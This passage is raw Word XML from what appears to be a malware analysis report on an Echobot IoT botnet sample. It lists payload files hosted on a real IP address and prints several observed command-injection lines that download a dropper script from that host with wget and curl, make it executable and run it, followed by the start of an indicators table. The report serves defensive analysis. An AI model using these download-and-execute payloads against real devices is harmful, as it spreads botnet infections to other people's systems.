    <w:p w14:paraId="2B46A780" w14:textId="6C21B7F2" w:rsidR="00F71DCF" w:rsidRDefault="00F71DCF" w:rsidP="00F71DCF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc101201918"/>
      <w:r w:rsidRPr="00F71DCF">
        <w:t>Command &amp; Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (C&amp;C)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="361870D8" w14:textId="72008D96" w:rsidR="001933A5" w:rsidRDefault="001933A5" w:rsidP="001933A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc101201919"/>
      <w:r>
        <w:t>Over</w:t>
      </w:r>
      <w:r w:rsidR="00957BD5">
        <w:t>view</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="232845B8" w14:textId="07BB675F" w:rsidR="00C423F8" w:rsidRDefault="00413A6D" w:rsidP="002E62FC">
      <w:r>
        <w:t>Thi</w:t>
      </w:r>
      <w:r w:rsidR="0023754B">
        <w:t xml:space="preserve">s malware sample was </w:t>
      </w:r>
      <w:r w:rsidR="009B3B4D">
        <w:t>hosted on a server with IP 80.82.67.184</w:t>
      </w:r>
      <w:r w:rsidR="00C650FB">
        <w:t xml:space="preserve"> alongside several other malicious samples. The malware is</w:t>
      </w:r>
      <w:r w:rsidR="009F2125">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidR="00C650FB">
        <w:t xml:space="preserve"> dropped by a script named ‘Richard’</w:t>
      </w:r>
      <w:r w:rsidR="009F2125">
        <w:t xml:space="preserve"> which fetches numerous</w:t>
      </w:r>
      <w:r w:rsidR="005B6225">
        <w:t xml:space="preserve"> malicious</w:t>
      </w:r>
      <w:r w:rsidR="009F2125">
        <w:t xml:space="preserve"> payloads via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F2125">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00681164">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681164">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00681164">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00702978">
        <w:t xml:space="preserve">The script will then give execution permission to the payloads via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00702978">
        <w:t xml:space="preserve">command such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:r w:rsidR="00702978">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00702978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 777. </w:t>
      </w:r>
      <w:r w:rsidR="00702978">
        <w:t>The script would then execute the payloads to infect IoT devices to be used in the Echobot botnet.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="3681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3681"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B112E6" w14:paraId="3DBEFFE8" w14:textId="77777777" w:rsidTr="00BD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5E4662" w14:textId="460AA6A4" w:rsidR="00B112E6" w:rsidRDefault="00614C1B" w:rsidP="00BD63A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Files Hosted on 80.82.67.184</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="4CD6FF3E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6C4D1B" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00660D08" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00660D08">
              <w:t>80.82.67.184/Richard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="0A69D9A7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0ABFB8" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C423F8">
              <w:t>ECHOBOT.arm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="4A62D3BC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CF8D0C" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.arm4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="5A3629A5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61ACFC" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.arm</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="749954E0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E88092" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.arm</w:t>
            </w:r>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="4EF22C69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5A0EAF" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.arm</w:t>
            </w:r>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="4DA0DEBA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9E9402" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.i486</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="5E136AFF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8D62C8" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.i686</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="5A6F39C6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FC9866" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.m68k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="71A62800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8084E06" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C423F8">
              <w:t>ECHOBOT.mips</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="183EAD82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597087" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.mips</w:t>
            </w:r>
            <w:r>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="1F44EE6F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30C20" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C423F8">
              <w:t>ECHOBOT.mpsl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="56037E14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7BE4C1" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C423F8">
              <w:t>ECHOBOT.</w:t>
            </w:r>
            <w:r>
              <w:t>ppc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="6A0BB21F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08A76C" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.</w:t>
            </w:r>
            <w:r>
              <w:t>sh4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="42FD35A2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BD51EF" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.</w:t>
            </w:r>
            <w:r>
              <w:t>spc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="10E0179E" w14:textId="77777777" w:rsidTr="00BD63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FF72B4" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.</w:t>
            </w:r>
            <w:r>
              <w:t>x86</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B112E6" w14:paraId="3B0A8A16" w14:textId="77777777" w:rsidTr="00BD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F6D306" w14:textId="77777777" w:rsidR="00B112E6" w:rsidRPr="00C423F8" w:rsidRDefault="00B112E6" w:rsidP="00BD63A0">
            <w:r w:rsidRPr="00C423F8">
              <w:t>80.82.67.184/ECHOBOT.x86_64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="336798B4" w14:textId="34D0FC5C" w:rsidR="00047950" w:rsidRDefault="00BA2BA7" w:rsidP="0043779E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An example of some of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A52D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A52D37">
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell commands used within this malware sample</w:t>
      </w:r>
      <w:r w:rsidR="00186EBB">
        <w:t xml:space="preserve"> on vulnerable IoT devices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A1D32">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seen below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="128"/>
        <w:tblW w:w="8075" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8075"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F66BFE" w14:paraId="37E5D68D" w14:textId="77777777" w:rsidTr="00F4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64533EC" w14:textId="560B76EE" w:rsidR="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> shell command examples seen in this malware variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F66BFE" w14:paraId="3D9B124E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610ACA2" w14:textId="77777777" w:rsidR="00F66BFE" w:rsidRPr="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve">/ECHOBOT; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> +x /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/ECHOBOT; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/ECHOBOT&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>SmartDevURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>u:SetSmartDevInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>s:Body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>s:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0764B5B2" w14:textId="6A9CA271" w:rsidR="00F66BFE" w:rsidRPr="00F71DCF" w:rsidRDefault="00F66BFE" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F66BFE" w14:paraId="5F7F3FC9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11A0D5C" w14:textId="43FFB2F5" w:rsidR="00F66BFE" w:rsidRPr="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve">/f; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> 777 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/f; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/f; &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>f ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>&amp;targetUri=/tmp/thumb/test.jpg&amp;mediaType=image&amp;targetWidth=400&amp;targetHeight=400&amp;scaleType=crop&amp;=1537275717150 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F66BFE" w14:paraId="4C69517E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FBEF928" w14:textId="26A7E2A5" w:rsidR="00F66BFE" w:rsidRPr="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> +x /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>`%&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F66BFE" w14:paraId="58A32F73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CC4787C" w14:textId="77777777" w:rsidR="00F66BFE" w:rsidRPr="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F66BFE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7F682011" w14:textId="4F1D2941" w:rsidR="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F66BFE" w14:paraId="105BF78E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760319D" w14:textId="4B6EA445" w:rsidR="00F66BFE" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard;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richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/richard)&amp;test=DNS_TEST&amp;requestTimeout=90&amp;auth_token=&amp;_cmd=run_diagnostic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FF97F32" w14:textId="77777777" w:rsidR="00F66BFE" w:rsidRPr="00BA2BA7" w:rsidRDefault="00F66BFE" w:rsidP="00F66BFE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F65A79D" w14:textId="070EE81D" w:rsidR="00E70AFD" w:rsidRDefault="00B912E7" w:rsidP="009E585D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc101201920"/>
      <w:r>
        <w:t>Network IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="128"/>
        <w:tblW w:w="8075" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8075"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E70AFD" w14:paraId="4D048615" w14:textId="77777777" w:rsidTr="009E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9272007" w14:textId="77777777" w:rsidR="00E70AFD" w:rsidRDefault="00E70AFD" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP IOC’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70AFD" w14:paraId="199CC242" w14:textId="77777777" w:rsidTr="009E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198AFCA" w14:textId="343E2103" w:rsidR="00E70AFD" w:rsidRPr="00F71DCF" w:rsidRDefault="00C97199" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidR="00E70AFD" w:rsidRPr="003B5BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://bea.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70AFD" w14:paraId="316767E6" w14:textId="77777777" w:rsidTr="009E585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B05324D" w14:textId="27D5DEDF" w:rsidR="00E70AFD" w:rsidRDefault="00C97199" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidR="00E70AFD" w:rsidRPr="003B5BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://www.w3.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70AFD" w14:paraId="1240586A" w14:textId="77777777" w:rsidTr="009E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72840B" w14:textId="2BD63D6B" w:rsidR="00E70AFD" w:rsidRDefault="00C97199" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
